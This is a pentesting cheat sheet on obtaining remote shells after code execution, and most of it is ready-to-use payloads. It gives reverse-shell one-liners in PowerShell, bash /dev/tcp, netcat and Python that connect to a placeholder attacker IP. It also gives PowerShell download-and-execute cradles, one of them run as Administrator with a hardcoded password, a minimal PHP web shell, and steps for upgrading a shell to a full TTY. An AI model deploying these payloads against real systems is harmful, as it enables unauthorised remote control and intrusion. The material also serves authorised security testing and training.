Shells

Introduction

If you have successfully exploited a vulnerability on a system and you got Remote Code Execution (RCE), you could obtain a shell from the remote system.

Types of shell

Depending on the type of connection with the shell, whether it is interactive and whether the payload is staged, we can classify a shell in the following categories.

Reverse & bind shell

Reverse shells

Reverse shells are when the target is forced to execute code that connects back to your computer. Reverse shells are an excellent way to bypass firewall rules that may prevent you from connecting to arbitrary ports on the target. However, when receiving a reverse shell from a machine across the Internet, you must configure your own network or use third-party tools to obtain the shell.

Bind Shells

Bind shells are when the code executed is used to start a listener port attached to a shell directly on the target. In some cases, this port would be accessible through the Internet or would require configuring the target network to allow port forwarding for that specific port. Then, you can connect to the port gaining remote code execution. This has the advantage of not requiring any local network configuration but may be prevented by firewalls protecting the target.

Staged & Stageless

Staged payloads

Staged payloads are sent in two parts:

• The first part is called the stager, which does not contain any shellcode, is executed directly on the target and connects back to the attacker for downloading the actual payload.

• The second part is the actual payload, which is executed directly, preventing it from being stored on the disk caught by traditional anti-virus.

Staged payloads require a particular, usually would be the Metasploit multi/handler, capable of sending different staged payloads and retrieving the final reverse shell.

Stagesless payloads

Stageless payloads are entirely self-contained in one piece of code, that sends a shell back immediately to the waiting listener when executed.

Note: To differentiate between staged and stageless payloads on Metasploit and Msfvenom, staged payloads look like windows/shell/reverse_tcp, meanwhile stageless look like windows/shell_reverse_tcp.

Interactive & non-Interactive

Interactive shell

Interactive shells allow you to interact with programs like vim, nano, sudo and execute keywords like [Ctrl]+c, [Ctrl]+l. Examples of interactive shells would be Powershell, Bash, Zsh and sh.

Non-Interactive shell

Non-Interactive shells limit the attacker to only interact with programs that do not require user interaction like grep, whoami, cat... Unfortunately, the majority of simple reverse and bind shells are this type of shell, making further exploitation trickier.

Nonetheless, we can upgrade a non-interactive shell into a full TTY one depending on the environment.

Payload resources

In this subsection, you can find a list of web pages with payloads for obtaining reverse or web shells.

Reverse Shells

Windows

# shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("<YOUR_IP>",<LISTENING_PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# COMMAND
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1')"

• Start a shell in a new process.

Start-Process -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1')"

• Start process as other user.

# Store user's credentials as variables
$pass = ConvertTo-SecureString 'Go1Ln5z63z&Tg.' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $pass)
# Launch a process
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://<YOUR_IP>/shell.ps1')" -Credential $cred

• Netcat

# https://github.com/int0x33/nc.exe/raw/master/nc64.exe
nc.exe -e cmd.exe <YOUR_IP> <LISTENING_PORT>

Linux

bash -i >& /dev/tcp/<YOUR_IP>/<LISTENING_PORT> 0>&1
nc -e /bin/sh <YOUR_IP> <LISTENING_PORT>
touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <YOUR_IP> <LISTENING_PORT> > /tmp/f
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR_IP>",<LISTENING_PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Generators & cheat sheets

Web Shells

By default, Kali-Linux has a folder with a set of web shells under /usr/share/webshells/. Nevertheless, here is a list with more web shell payloads:

Very simple webshell.

<?=`$_GET[c]`?>

Fully TTY

Linux

python3 -c "import pty; pty.spawn('/bin/bash')"
<Ctrl+z>
stty raw -echo; fg
reset
screen
export TERM=screen;export SHELL=/bin/bash;
stty rows <ROWS> columns <COLUMNS>

Note: To obtain the number of rows and columns of your terminal type stty -a.

Windows

It is not possible to obtain a fully TTY interactive shell. However, we can get something similar that still is not interactive.

Thanks to rlwrap, the attacker can edit commands before sending them and have a command history.

rlwrap nc -nvlp <LISTENING_PORT>

Jump from x86 to x64 (Powershell)

How to check if you are in a 32 or 64-bit process.

[Environment]::Is64BitProcess 

[IntPtr]::Size

• If Pointer size == 4 -> 32

• If Pointer size == 8 -> 64

To jump to a 64-bit process execute the following PowerShell executable.

# It might not exist
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe
# Then try this one
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Finally, if you want to jump from from a x64 to a x86 process you can use:

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

References